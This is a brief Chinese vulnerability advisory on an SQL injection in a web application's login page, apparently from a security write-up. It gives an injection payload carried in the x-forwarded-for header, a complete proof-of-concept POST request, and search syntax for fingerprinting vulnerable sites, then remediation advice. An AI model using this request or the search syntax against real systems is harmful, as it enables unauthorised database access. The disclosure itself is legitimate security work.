漏洞描述
攻击者通过构造恶意 userip
参数(如 127.0.0.1' and exists(select * from admin)--
),触发数据库错误回显
影响范围
涉及未正确过滤用户输入的登录/审计功能模块
搜索语法
body="res/img/ht_box_back.gif" || body="/res/img/ht_box_top.gif" || body="/res/img/ht_box_bottom.gif" || body="dom_loaded.load(init);"
原理
POST /m/login.php?op=login HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: application/x-www-form-urlencoded
x-forwarded-for: "127.0.0.1 ' and exists(select * from xxxxx)-- 123"
username=admin&password=admin&vcode=4997&to=&vcode_hash=03b498138c14b2d0515b5438808d6604
复现
数据库名
修复建议
1.使用参数化查询(绝对禁止拼接SQL)
2.增强过滤
3.生产环境关闭数据库错误回显